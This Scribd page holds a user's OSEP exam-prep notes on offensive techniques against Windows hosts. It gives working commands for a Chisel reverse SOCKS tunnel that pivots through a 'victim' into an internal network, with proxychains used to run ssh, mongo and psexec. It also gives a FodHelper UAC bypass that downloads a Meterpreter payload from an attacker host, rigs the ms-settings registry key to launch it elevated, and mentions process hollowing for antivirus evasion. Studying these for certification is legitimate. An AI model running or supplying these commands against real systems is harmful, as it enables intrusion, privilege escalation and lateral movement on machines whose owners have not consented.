Scribd
Upload
958 views

OSEP Additional Note

1. The document describes how to use Chisel to pivot through a victim server to gain access to an internal network. It provides commands to set up a Chisel server on Kali and connect a Chisel client on the victim machine to tunnel traffic through. 2. It also outlines how to use FodHelper to bypass UAC and execute a Meterpreter payload on the victim. It provides steps to download the payload, configure the registry to trigger it, and run FodHelper to gain elevated privileges. 3. Additional payloads may need to be generated using techniques like process hollowing and encrypted shellcode to evade antivirus detection on the victim.

Uploaded by

Hoàng Trong
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
958 views

OSEP Additional Note

1. The document describes how to use Chisel to pivot through a victim server to gain access to an internal network. It provides commands to set up a Chisel server on Kali and connect a Chisel client on the victim machine to tunnel traffic through. 2. It also outlines how to use FodHelper to bypass UAC and execute a Meterpreter payload on the victim. It provides steps to download the payload, configure the registry to trigger it, and run FodHelper to gain elevated privileges. 3. Additional payloads may need to be generated using techniques like process hollowing and encrypted shellcode to evade antivirus detection on the victim.

Uploaded by

Hoàng Trong
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 2

OSEP Additional Note

1. Pivot with Chisel


Upload chisel/chisel.exe from Kali to c:\windows\tasks on victim server
Check your proxychains config on your Kali at /etc/proxychains4.conf . It must open
a port for listen as a proxy server

On my Kali, I config Proxychains use port 1080 for proxy server listener port
On your Kali, run follow command to create 1 Chisel server: ./chisel server -p 8080 -
-socks5 --reverse :

This command will instruct Chisel use socks5 info on /etc/proxychains to create
a chisel server with listening port is 1085
On victim, run a Chisel client to connect tunnel to the Chisel server on our Kali:
.\chisel.exe client -v 192.168.49.109:8080 R:1080:socks
bot chisel and chisel.exe are the same command above

If success, on Chisel server at Kali will appear this Listening line:

→ After that, you can use proxychains to pivot any command from your Kali directly to
internal network:

proxychains4 ssh [email protected]


proxychains mongo "mongodb://internal.host:27017/internal_service"
proxychains python3 /usr/share/doc/python3-impacket/examples/psexec.py
username:[email protected]

2. FodHelper bypass UAC


Must run fodhelper.exe on x64 shell. Check shell: [Environment]::Is64BitProcess

# Put the payload in C:\Meterpreter.exe

Invoke-WebRequest -Uri http://IP_KALI/Meterpreter.exe -Outfile

c:\windows\tasks\Meterpreter.exe;

# Configure the exploit

New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force

New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command"


-Name "DelegateExecute" -Value "" -Force

Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command"


-Name "(default)" -Value "C:\\windows\\tasks\\Meterpreter.exe" -Force

# Run it! And FodHelper will execute our c:\windows\tasks\Meterpreter.exe

C:\Windows\System32\fodhelper.exe

Sometimes, you need create your Meterpreter.exe by Process Hollowing + encrypted


shellcode to AV evasion.

You might also like